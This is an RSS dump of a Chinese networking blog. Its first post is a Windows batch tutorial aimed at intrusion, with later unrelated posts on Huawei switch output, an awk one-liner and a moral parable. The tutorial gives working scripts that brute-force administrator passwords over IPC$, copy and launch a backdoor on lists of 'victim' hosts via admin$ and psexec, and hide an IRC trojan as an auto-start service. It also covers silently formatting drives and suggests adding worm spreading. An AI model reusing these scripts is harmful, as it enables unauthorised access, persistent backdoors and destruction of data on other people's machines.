http://www.idcnote.com/ zh-cn PBlog2 v2.4 http://www.idcnote.com/images/logos.gif http://www.idcnote.com/ IDC笔记 http://www.idcnote.com/default.asp?id=66 wentaiyou@126.com(kevin) Thu,22 Jul 2010 14:00:38 +0800 http://www.idcnote.com/default.asp?id=66
一.简单批处理内部命令简介
1.echo 命令
    打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将显示当前回显设置。
    语法
    echo [] [message]
    Sample：@echo off / echo hello world
    在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用> >> ^）结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。

2.@ 命令
    表示不显示@后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让对方看到你使用的命令啦。
    Sample：@echo off
    @echo Now initializing the program,please wait a minite...
    @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的，可喜的是微软留了个autoset这个参数给我们，效果和/y是一样的。win2k不支持)
3.goto 命令
    指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。
    语法：goto label （label是参数，指定所要转向的批处理程序中的行。）
    Sample：
    if =={} goto noparms
    if =={} goto noparms（如果这里的if、%1、%2你不明白的话，先跳过去，后面会有详细的解释。）
    @Rem check parameters if null show usage
    :noparms
    echo Usage: monitor.bat ServerIP PortNumber
    goto end
    标签的名字可以随便起，但是最好是有意义的字母啦，字母前加个：用来表示这个字母是标签，goto命令就是根据这个：来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。
4.rem 命令
    注释命令，在C语言中相当与/*--------*/,它并不会被执行，只是起一个注释的作用，便于别人阅读和你自己日后修改。
    Rem Message
    Sample：@Rem Here is the description.
5.pause 命令
    运行 Pause 命令时，将显示下面的消息：
    Press any key to continue . . .
    Sample：
    @echo off
    :begin
    copy a:*.* d：back
    echo Please put a new disk into driver A
    pause
    goto begin
    在这个例子中，驱动器 A 中磁盘上的所有文件均复制到d:back中。显示的注释提示您将另一张磁盘放入驱动器 A 时，pause 命令会使程序挂起，以便您更换磁盘，然后按任意键继续处理。
6.call 命令
    从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call，它将不会在命令行起作用。
    语法
    call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
    参数
    [Drive:}[Path] FileName
    指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。
7.start 命令
    调用外部程序，所有的DOS命令和命令行程序都可以由start命令来调用。
    入侵常用参数：
    MIN 开始时窗口最小化
    SEPARATE 在分开的空间内开始 16 位 Windows 程序
    HIGH 在 HIGH 优先级类别开始应用程序
    REALTIME 在 REALTIME 优先级类别开始应用程序
    WAIT 启动应用程序并等候它结束
    parameters 这些为传送到命令/程序的参数
    执行的应用程序是 32-位 GUI 应用程序时，CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行，该新行为则不会发生。
8.choice 命令(win2k已失效)
    choice 使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应该加/c:参数，c:后应写提示可输入的字符，之间无空格。它的返回码为1234……
如: choice /c:dme defrag,mem,end
    将显示
    defrag,mem,end[D,M,E]?
    Sample：
    Sample.bat的内容如下:
    @echo off
    choice /c:dme defrag,mem,end
    if errorlevel 3 goto defrag （应先判断数值最高的错误码）
    if errorlevel 2 goto mem
    if errotlevel 1 goto end
    :defrag
    c:dosdefrag
    goto end
    :mem
    mem
    goto end
    :end
    echo good bye
    此文件运行后，将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ，然后if语句将作出判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以goto end将程序跳到end标号处，然后程序将显示good bye，文件结束。
9.If 命令
    if 表示将判断是否符合规定的条件，从而决定执行不同的命令。 有三种格式:
    1、if "参数" == "字符串" 　待执行的命令
    参数如果等于指定的字符串，则条件成立，运行命令，否则运行下一句。(注意是两个等号）
    如if "%1"=="a" format a:
    if =={} goto noparms
    if =={} goto noparms
    2、if exist 文件名　 待执行的命令
    如果有指定的文件，则条件成立，运行命令，否则运行下一句。
    如if exist config.sys edit config.sys
    3、if errorlevel / if not errorlevel 数字　 待执行的命令
    如果返回码等于指定的数字，则条件成立，运行命令，否则运行下一句。
    如if errorlevel 2 goto x2 　
    DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的返回码为0、1。
10.for 命令
    for 命令是一个比较复杂的命令，主要用于参数在指定的范围内循环执行命令。在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable
    for in (set) do command [CommandLineOptions]
        %variable 指定一个单一字母可替换的参数。
        (set) 指定一个或一组文件。可以使用通配符。
        command 指定对每个文件执行的命令。
        command-parameters 为特定命令指定参数或命令行开关。
        在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable，而不要用 %variable。变量名称是区分大小写的，所以 %i 不同于 %I
    如果命令扩展名被启用，下列额外的 FOR 命令格式会受到支持:
    FOR /D %variable IN (set) DO command [command-parameters]
    如果集中包含通配符，则指定与目录名匹配，而不与文件名匹配。
    FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]
    检查以 [drive:]path 为根的目录树，指向每个目录中的FOR 语句。如果在 /R 后没有指定目录，则使用当前目录。如果集仅为一个单点(.)字符，则枚举该目录树。
    FOR /L %variable IN (start,step,end) DO command [command-parameters]
    该集表示以增量形式从开始到结束的一个数字序列。 因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生 序列 (5 4 3 2 1)。
    FOR /F ["options"] %variable IN (filenameset) DO command
    FOR /F ["options"] %variable IN ("string") DO command
    FOR /F ["options"] %variable IN (`command`) DO command
    或者，如果有 usebackq 选项:
    FOR /F ["options"] %variable IN (file-set) DO command
    FOR /F ["options"] %variable IN ("string") DO command
    FOR /F ["options"] %variable IN (`command`) DO command
    filenameset 为一个或多个文件名。继续到 filenameset 中的下一个文件之前，每份文件都已被打开、读取并经过处理。 处理包括读取文件，将其分成一行行的文字，然后将每行解析成零或更多的符号。然后用已找到的符号字符串变量值调用 For 循环。以默认方式，/F 通过每个文件的每一行中分开的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个指定不同解析选项的关键字。这些关键字为:
    eol=c - 指一个行注释字符的结尾(就一个)
    skip=n - 指在文件开始时忽略的行数。
    delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。
    tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的格式为一个范围。通过 n 符号指定 m 符号字符串中的最后一个字符星号， 那么额外的变量将在最后一个符号解析之分配并接受行的保留文本。
    usebackq - 指定新语法已在下类情况中使用: 在作为命令执行一个后引号的字符串并且引号字符为文字字符串命令并允许在 fi 中使用双引号扩起文件名称。
sample1:
    FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
   会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或空格定界符号。请注意，这个 for 程序体的语句引用 %i 来取得第二个符号，引用 %j 来取得第三个符号，引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用 usebackq 选项，否则，双引号会被理解成是用作定义某个要分析的字符串的。
    %i 专门在 for 语句中得到说明，%j 和 %k 是通过 tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号，只要不试图说明一个高于字母 “z” 或 “Z” 的变量。请记住，FOR 变量是单一字母、分大小写和全局的；同时不能有 52 个以上都在使用中。
    您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，用单引号将括号之间的 filenameset 括起来。这样，该字符串会被当作一个文件中的一个单一输入行。
    最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此，以下例子:
    FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
    会枚举当前环境中的环境变量名称。
    另外，FOR 变量参照的替换已被增强。您现在可以使用下列
    选项语法:
    ~I - 删除任何引号(")，扩充 %i
    %~fi - 将 %i 扩充到一个完全合格的路径名
    %~di - 仅将 %i 扩充到一个驱动器号
    %~pi - 仅将 %i 扩充到一个路径
    %~ni - 仅将 %i 扩充到一个文件名
    %~xi - 仅将 %i 扩充到一个文件扩展名
    %~si - 扩充的路径只含有短名
    %~ai - 将 %i 扩充到文件的文件属性
    %~ti - 将 %i 扩充到文件的日期/时间
    %~zi - 将 %i 扩充到文件的大小
    %~$PATH:i - 查找列在路径环境变量的目录，并将 %i 扩充到找到的第一个完全合格的名称。如果环境变量未被定义，或者没有找到文件，此组合键会扩充空字符串
    可以组合修饰符来得到多重结果:
    %~dpi - 仅将 %i 扩充到一个驱动器号和路径
    %~nxi - 仅将 %i 扩充到一个文件名和扩展名
    %~fsi - 仅将 %i 扩充到一个带有短名的完整路径名
    %~dp$PATH:i - 查找列在路径环境变量的目录，并将 %i 扩充
    到找到的第一个驱动器号和路径。
    %~ftzai - 将 %i 扩充到类似输出线路的 dir
    在以上例子中，%i 和 PATH 可用其他有效数值代替。%~ 语法用一个有效的 FOR 变量名终止。选取类似 %i 的大写变量名比较易读，而且避免与不分大小写的组合键混淆。
    以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。
    sample2：
    利用For命令来实现对一台目标Win2k主机的暴力密码破解。
    我们用net use ipipc$ "password" /u:"administrator"来尝试这和目标主机进行连接，当成功时记下密码。
    最主要的命令是一条：for /f %i in (dict.txt) do net use ipipc$ "%i" /u:"administrator"
    用%i来表示admin的密码，在dict.txt中这个取%i的值用net use 命令来连接。然后将程序运行结果传递给find命令－－
    for /f %i in (dict.txt) do net use ipipc$ "%i" /u:"administrator"|find ":命令成功完成">>Dk.txt ，这样就ko了。
    sample3：
    你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何实现呢？呵呵，看下去你就会明白了。
    主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable）
    @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
    tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
    而cultivate.bat无非就是用net use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码（If errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。
    delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列，一般就是 ip password username。

代码雏形：
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------

------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use %1ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec %1 c:winntsystem32windrv32.exe
@psexec %1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
      这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe）,PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.
二.如何在批处理文件中使用参数
    批处理中可以使用参数，一般从1%到 9%这九个，当有多个参数时需要用shift来移动，这种情况并不多见，我们就不考虑它了。
    sample1：fomat.bat
    @echo off
    if "%1"=="a" format a:
    :format
    @format a:/q/u/auotset
    @echo please insert another disk to driver A.
    @pause
    @goto fomat
    这个例子用于连续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bat a，呵呵,好像有点画蛇添足了～^_^
sample2：
    当我们要建立一个IPC$连接地时候总要输入一大串命令，弄不好就打错了，所以我们不如把一些固定命令写入一个批处理，把肉鸡地ip password username 当着参数来赋给这个批处理，这样就不用每次都打命令了。
    @echo off
    @net use 1%ipc$ "2%" /u:"3%" 注意哦，这里PASSWORD是第二个参数。
    @if errorlevel 1 echo connection failed
    怎么样,使用参数还是比较简单的吧？你这么帅一定学会了^_^.
三.如何使用组合命令(Compound Command)
1.&
    Usage：第一条命令 & 第二条命令 [& 第三条命令...]
    
    用这种方法可以同时执行多条命令，而不管命令是否执行成功
    
    Sample：
    C:>dir z: & dir c:Ex4rch
    The system cannot find the path specified.
    Volume in drive C has no label.
    Volume Serial Number is 0078-59FB
    
    Directory of c:Ex4rch
    
    2002-05-14 23:51 <DIR> .
    2002-05-14 23:51 <DIR> ..
    2002-05-14 23:51 14 sometips.gif
2.&&
    Usage：第一条命令 && 第二条命令 [&& 第三条命令...]
    用这种方法可以同时执行多条命令，当碰到执行出错的命令后将不执行后面的命令，如果一直没有出错则一直执行完所有命令；
    Sample：
    C:>dir z: && dir c:Ex4rch
    The system cannot find the path specified.
    
    C:>dir c:Ex4rch && dir z:
    Volume in drive C has no label.
    Volume Serial Number is 0078-59FB
    
    Directory of c:Ex4rch
    
    2002-05-14 23:55 <DIR> .
    2002-05-14 23:55 <DIR> ..
    2002-05-14 23:55 14 sometips.gif
    1 File(s) 14 bytes
    2 Dir(s) 768,671,744 bytes free
    The system cannot find the path specified.
    
    在做备份的时候可能会用到这种命令会比较简单，如：
    dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:backup
    如果远程服务器上存在backup.mdb文件，就执行copy命令，若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 ：）
    3.||
    
    Usage：第一条命令 || 第二条命令 [|| 第三条命令...]
    
    用这种方法可以同时执行多条命令，当碰到执行正确的命令后将不执行后面的命令，如果没有出现正确的命令则一直执行完所有命令；
    
    Sample：
    C:Ex4rch>dir sometips.gif || del sometips.gif
    Volume in drive C has no label.
    Volume Serial Number is 0078-59FB
    
    Directory of C:Ex4rch
    
    2002-05-14 23:55 14 sometips.gif
    1 File(s) 14 bytes
    0 Dir(s) 768,696,320 bytes free
    组合命令使用的例子：
    sample：
    @copy trojan.exe %1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt

四、管道命令的使用
1.| 命令
    Usage：第一条命令 | 第二条命令 [| 第三条命令...]
    将第一条命令的结果作为第二条命令的参数来使用，记得在unix中这种方式很常见。

    sample：
    time /t>>D:IP.log
    netstat -n -p tcp|find ":3389">>D:IP.log
    start Explorer
    看出来了么？用于终端服务允许我们为用户自定义起始的程序，来实现让用户运行下面这个bat，以获得登录用户的IP。
2.>、>>输出重定向命令
    将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于，>会清除调原有文件中的内容后写入指定文件，而>>只会追加内容到指定文件中，而不会改动其中的内容。
    sample1：
    echo hello world>c:hello.txt (stupid example?)
    sample2:
    时下DLL木马盛行，我们知道system32是个捉迷藏的好地方，许多木马都削尖了脑袋往那里钻，DLL马也不例外，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一个记录：运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中, 日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行: CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好，如果有的话也不要直接DEL掉，先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里，若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。
3.< 、>& 、<&
    < 从文件中而不是从键盘中读入命令输入。
    >& 将一个句柄的输出写入到另一个句柄的输入中。
    <& 从一个句柄读取输入并将其写入到另一个句柄输出中。
    这些并不常用，也就不多做介绍。

五.如何用批处理文件来操作注册表
    在入侵过程中经常回操作注册表的特定的键值来实现一定的目的，例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性，这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件) 关于注册表的操作，常见的是创建、修改、删除。
1.创建
    创建分为两种，一种是创建子项(Subkey)
    
    我们创建一个文件，内容如下：
    
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINESOFTWAREMicrosofthacker]
    
    然后执行该脚本，你就已经在HKEY_LOCAL_MACHINESOFTWAREMicrosoft下创建了一个名字为“hacker”的子项。
    另一种是创建一个项目名称
    那这种文件格式就是典型的文件格式，和你从注册表中导出的文件格式一致，内容如下：
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
    "Invader"="Ex4rch"
    "Door"=C:WINNTsystem32door.exe
    "Autodos"=dword:02
    这样就在[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下
    新建了:Invader、door、about这三个项目
    Invader的类型是“String value”
    door的类型是“REG SZ value”
    Autodos的类型是“DWORD value”

2.修改
    修改相对来说比较简单，只要把你需要修改的项目导出，然后用记事本进行修改，然后导入（regedit /s）即可。
3.删除
    我们首先来说说删除一个项目名称，我们创建一个如下的文件：

    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
    "Ex4rch"=-

    执行该脚本，[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下的"Ex4rch"就被删除了；

    我们再看看删除一个子项，我们创建一个如下的脚本：

    Windows Registry Editor Version 5.00
    [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]

    执行该脚本，[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]就已经被删除了。
    相信看到这里，.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了，记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
    samlpe1:如上面的那个例子,如想生成如下注册表文件
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
    "Invader"="Ex4rch"
    "door"=hex:255
    "Autodos"=dword:000000128
    只需要这样：
    @echo Windows Registry Editor Version 5.00>>Sample.reg
    
    @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>Sample.reg
    @echo "Invader"="Ex4rch">>Sample.reg
    @echo "door"=5>>C:WINNTsystem32door.exe>>Sample.reg
    @echo "Autodos"=dword:02>>Sample.reg

samlpe2:
    我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
    @start windrv32.exe
    @attrib +h +r windrv32.exe
    @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>patch.dll
    @echo "windsnx "=- >>patch.dll
    @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe
    @regedit /s patch.dll
    @delete patch.dll
    
    @REM [删除DSNXDE在注册表中的启动项，用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读，并config为自启动]
    @REM 这样不是更安全^_^.


{choice实际上是一个外部命令,它一般位于
%systemroot%\system32目录下,全名是choice.exe,因此所谓失效可能是在win2000
中默认没有此文件,但是一般拷贝一个其它系统中的choice.exe过去就可以了.
在win2003中存在此命令.}]]> http://www.idcnote.com/default.asp?id=65 wentaiyou@126.com(kevin) Sat,19 Jun 2010 14:25:48 +0800 http://www.idcnote.com/default.asp?id=65 S6506  Salience III
Slot No.  Brd Type    Brd Status   Subslot Num    Sft Ver         Patch Ver
0         LS81SRPG    Normal       0              S6506-3135      None      
1         NONE        Absent       Absent         None            None
2         LS81GT48    Normal       0              S6506-3135      None      
3         NONE        Absent       Absent         None            None
4         NONE        Absent       Absent         None            None
5         LS81GP48    Normal       0              S6506-3135      None      
6         NONE        Absent       Absent         None            None


<6506>dis version
Huawei Versatile Routing Platform Software
VRP software, Version 3.10, Release 3135
Copyright (c) 1998-2007 Huawei Technologies Co.,Ltd. All rights reserved.
Quidway S6506 uptime is 0 weeks, 2 days, 20 hours, 58 minutes


SRPG 0:  uptime is 0 weeks,2 days,20 hours,58 minutes
QuidwayS6500 with 1 MPC8245 Processor
256M    bytes SDRAM
32768K  bytes Flash Memory
512K    bytes NVRAM Memory
PCB Version      :   VER.C
BootROM Version  :   522
CPLD Version     :   004
Second CPLD Ver  :   005
Software Version :   S6506-3135
Patch Version    :   None

LPU 2:  uptime is 0 weeks,2 days,18 hours,37 minutes
QuidwayS6500 LPU with 1 MPC8241 Processor
128M    bytes SDRAM
0K      bytes Flash Memory
0K      bytes NVRAM Memory                
PCB Version      :   VER.B
BootROM Version  :   531
CPLD Version     :   005
Software Version :   S6506-3135
Patch Version    :   None

LPU 5:  uptime is 0 weeks,2 days,18 hours,27 minutes
QuidwayS6500 LPU with 1 MPC8245 Processor
256M    bytes SDRAM
32768K  bytes Flash Memory
0K      bytes NVRAM Memory
PCB Version      :   VER.C
BootROM Version  :   532
CPLD Version     :   006
Second CPLD Ver  :   006
Software Version :   S6506-3135
Patch Version    :   None


以上为板本为设备信息.
在创建ACL时为5000-5999
包对应情况如下:
AA AA AA BB BB BB CC CC DD DD DD DD
EF HH II  II
JJ  JJ   KK KK
LL MM NN NN
OO OO OO OO
PP PP PP PP

A->目的MAC
B->源MAC
C->数据类型
D->VLAN
下面是IP包头
rule 0 deny 0100 ffff 22 11 ff 27 为拒绝ID为256的UDP包]]> http://www.idcnote.com/default.asp?id=64 wentaiyou@126.com(kevin) Fri,04 Jun 2010 11:34:56 +0800 http://www.idcnote.com/default.asp?id=64 VIDL            95%               6/a6a367bb  空闲任务，这个任务占用率越高，CPU越空闲。
TICK             0%               0/ 4626774  定时器相关
co0             0%               0/  1fd656  串口服务
IPCR             0%               0/  82bc1b  内部通讯相关
VPR             0%               0/  d2e9a7  内部通讯相关
VPS             0%               0/  14f5ff  内部通讯相关
Ecm             0%               0/  c33122  内部通讯相关  
RTMR             0%               0/ 431e350  定时器相关
IPCQ             0%               0/  4b71db  内部通讯相关
  VP             0%               0/    237f  内部通讯相关
RPCQ             0%               0/  13b4ad  内部通讯相关
BEAT             0%               0/  2a6146  系统监控相关  
VMON             0%               0/   760e8  系统监控相关
VRRP             0%               0/  5dc925  VRRP相关  
INFO             0%               0/ 44deab1  信息中心
LCS             0%               0/  980a4b  license
CDEV             0%               0/  385a40  设备管理相关
DFSU             0%               0/ 1beefd5  灵活插卡
DSMS             0%               0/   36fa0  内部通讯相关
PPI             0%               0/  130bd0  二层接口相关
L2IF             0%               0/ 34fdf6c  二层接口相关
MFLP             0%               0/   5c02b  不用关心
LLDP             0%               0/   55fba  LLDP协议相关
APS             0%               0/  2e6748  系统相关  
FIB6             0%               0/  f64346  IPV6相关
BFD             0%               0/  744819  BFD协议
ROUT             0%               0/ d01a028  路由相关
OAM             0%               0/  63dd7a  OAM
LSPA             0%               0/  7b21e9  MPLS协议
PHY             0%               0/   51284  系统相关
RSVP             0%               0/  5e7018  系统相关
CSPF             0%               0/ 18d0e22  系统相关
TNLM             0%               0/  313ebc  系统相关
SNPG             0%               0/  7f6c2d  igmp snooping
EOAM             0%               0/   59670  以太链路检测
TRAF             0%               0/  6524e3  系统相关
DLDP             0%               0/   51f5d  DLDP协议
LDT             0%               0/   43bb7  LDT协议
ELAB             0%               0/   7a9a3  电子标签
GREP             0%               0/   3e469  GRE
SECE             0%               0/  2db26f  安全
QOSA             0%               0/    4041  QOS
IPMC             0%               0/  36d642  组播协议
SOCK             0%               0/  9095d5  通讯相关
VTYD             0%               0/  619a17  telnet服务
TUNN             0%               0/  77f664  TUNNEL
TRAP             0%               0/ 223ff4e  信息中心相关
MDMT             0%               0/ 15fae4b  modem
LOAD             0%               0/   486f1  系统相关
NTPT             0%               0/ b553133  NTP时间同步
TAC             0%               0/  613d31  Tacacs
UCM             0%               0/    c663  不用关心
LAM             0%               0/    314c  不用关心
HS2M             0%               0/  488ca7  系统相关
MSTP             0%               0/ 276034e  MSTP协议
SMLK             0%               0/   74311  smartlink协议
RRPP             0%               0/   a6156  RRPP
DHCP             0%               0/  160760  DHCP
RMON             0%               0/   a99ea  流量监控
HOT             0%               0/ 3833372  系统相关
vt0             0%               0/  1d4592  telnet服务
  OS             5%               0/       0  操作系统任务]]> http://www.idcnote.com/default.asp?id=63 wentaiyou@126.com(kevin) Fri,19 Mar 2010 15:36:30 +0800 http://www.idcnote.com/default.asp?id=63 a 1
b 9
c 1
d 1
e 3
f 3
g 1

date的内容为上。
如何打印出第二列最大的行
awk 'NR==FNR{t=(t>$2)?t:$2}NR>FNR&&$NF==t' date date]]> http://www.idcnote.com/default.asp?id=62 wentaiyou@126.com(kevin) Wed,10 Mar 2010 20:44:17 +0800 http://www.idcnote.com/default.asp?id=62     （一）

    A.一位饿得奄奄一息的人，跌跌撞撞地跑到一位农夫家。农夫给他一个馒头、一碗水，饥饿者得救了。得救者走到农夫家里，发现农夫家里一无所有。感动得热泪盈眶，长跪不起。此后，他身怀感恩，把爱带给他所遇到的需要帮助的人。
    B.一位饿得奄奄一息的人，跌跌撞撞地跑到一位农夫家。农夫给他一个馒头、一碗水，饥饿者得救了。得救者走到农夫家里，发现农夫家里摆着很多好吃的。感恩很快被愤怒替代。他举刀杀了农夫，因为，他发现农夫还有那么多没有给他。
    思考1：同样的行为会得到完全相反的结果——看到自己得到的，会感恩；看到自己没有得到的，会仇恨。
    思考2：救人命的是农夫奉献的馒头和水，与农夫自身拥有的并无关系。但现实的教育，更注重农夫一无所有情况下的慷慨，那意味着更高尚。这不自然改变了人们心中的标准和预期。实际上，爱心存在于生活的每一点，都平常得不能再平常，每个人都可以献爱心，而不是期待一个像A农夫那样的人出现。每个人都是自己的救世主。每个人都可以力所能及地帮助身边的人。
    思考3：感恩或者仇恨，往往都由一些细节决定而非本质决定。从本质上看，A和B两种情况下，结果都应该是感恩的。但只有正常而理性的人才能在两种情况下都保持同样的感恩心态。
    思考4：在感恩和仇恨之外，是否还可以有另外一种心态存在？

    （二）

    A.一位饿得奄奄一息的人，跌跌撞撞地跑到一位农夫家。农夫给他一个馒头、一碗水，饥饿者得救了。但后来，人们发现这个被救者是个被通缉的贪官。于是，很多人仇恨农夫，认为他助纣为虐。
    B.一位饿得奄奄一息的人，跌跌撞撞地跑到一位农夫家。农夫给他一个馒头、一碗水，饥饿者得救了。但后来，人们发现这个被救者是个曾经多次助人的善人。于是，很多人称赞农夫做了一件大功德事。
    思考1：当救人于难要视身份救人，每个人都会根据自己的标准决定应该救什么人，应该不救什么人。于是，很多人多一事不如少一事，见什么人都不救了。
    思考2：如果人们在两种情况下，都能对农夫身怀敬意，爱心或会茁壮成长。反之，则在势利、戒心等等的影响下，爱心会丧失。

    （三）

    A.一位饿得奄奄一息的人，跌跌撞撞地跑到一位农夫家。这位农夫，指着另外一个农夫的家说：“看，那家就是曾施舍馒头和水救人的人，你去求他吧。”饥饿者艰难地走到那个农夫家门口，农夫开开门，抱歉地说：“我没有吃的了。”于是，全村的人都仇恨这位农夫，而没有人指责那位从来不帮人的农夫。
    B.一位饿得奄奄一息的人，跌跌撞撞地跑到一位农夫家。这位农夫，指着另外一个农夫的家说：“看，那家就是曾施舍馒头和水救人的人，你去求他吧。”饥饿者艰难地走到那个农夫家门口，农夫开开门，说：“我只有半个馒头了。”于是，全村的人都鄙视这位农夫，而没有人指责那位从来不帮人的农夫。
    思考1：对于有爱心者，人们的标准会不由自由地抬高。
    思考2：对于自私者，人们对把期望值降低到最小，因而也不会失望。
    思考3：超道德是驱逐爱心的强大力量，直到所有的人在面对饥饿者时都关上家门。

    （四）

    A.一位饿得奄奄一息的人，跌跌撞撞地跑到一位农夫家。农夫给他一个馒头、一碗水，饥饿者得救了。得救者走到农夫家里，发现农夫家里一无所有。感动得热泪盈眶，长跪不起。此后，他身怀感恩，把爱带给他所遇到的需要帮助的人。同时，对于农夫的任何行为，他都不问善恶，全力支持。农夫失去镜子，认为自己一切都是对的。后来，因犯大错破产。
